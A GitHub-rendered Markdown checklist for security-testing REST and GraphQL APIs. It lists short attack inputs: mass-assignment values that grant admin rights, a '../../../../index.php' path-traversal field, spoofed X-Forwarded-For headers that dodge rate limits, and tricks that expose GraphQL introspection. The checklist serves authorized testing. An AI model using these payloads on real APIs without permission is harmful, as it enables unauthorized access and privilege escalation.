Skip to content

Latest commit

 

History

History
107 lines (57 loc) · 2.64 KB

Checklist.md

File metadata and controls

107 lines (57 loc) · 2.64 KB

REST API

Broken Object Level Authorization (BOLA)

  • Test parameter value manipulation (e.g., id=1/id=0)

  • Test path value manipulation (e.g., /100/user to /101/user)

Mass Assigment

  • Test for "isadmin":"true"

  • Test for "isadmin": true

  • Test for "id": 1

  • Test for "user_role":"admin"

  • Test for "file_path":"../../../../index.php"

  • Test for "email-verify": true

  • Attempt to update a user's password without old password

Improper Assets Management

  • Test by changing the version in URL path (e.g., /api/v2/user to /api/v1/user)

  • Test by changing the version in request parameters (e.g., /api/product?ver=2)

  • Test by changing the version in request headers (e.g., Accept version=2.0)

Broken Function Level Authorization (BFLA)

  • Change path to access admin functionality (e.g., /user/10/delete to /admin/user/10/delete)

  • Attempt to view admin data (e.g., /user/view to /admin/view).

Other

  • Check for harmful HTTP methods (e.g., PUT/DELETE/TRACE)

  • Remove the authorization token and test for unauthenticated access.

  • Test MIME type validation bypass.

  • Use Wildcard parameter (/user/*)

  • Parameter pollution (id=1&id=2)

GraphQL API

Information Disclosure

  • Test GraphQL introspection

  • Find GraphiQL endpoint

  • Test GraphQL interface protection bypass by changing the cookie value from env=graphiql:disable to env=graphiql:enable

  • Bypass introspection by changing the content-type to URL-encoded introspection.

  • Use InQL Scanner to find hidden queries.

Denial of Service (DOS)

  • Test nested queries.

  • Test nested fragments.

  • Test batching queries.

REST And GraphQL

Lack of Rate Limit

  • Create an alias for the password field.

  • Change the endpoint with different spellings.

  • Changing IP In Request Header

    X-Forwarded-For:127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
use double X-Forwared-For header X-Forwarded-For: X-Forwarded-For: 127.0.0.1

Error Handling

  • Test error handling for field suggestions.

  • Test error handling for internal paths.

Server-Side Request Forgery (SSRF)

  • Test SSRF by manipulating the Referer header and including URLs.

  • Test SSRF by including full URLs in the POST body or parameters.

Cross-Site Request Forgery (CSRF)

  • Change the Content-Type: application/json header to Content-Type: x-www-form-urlencoded and check for CSRF.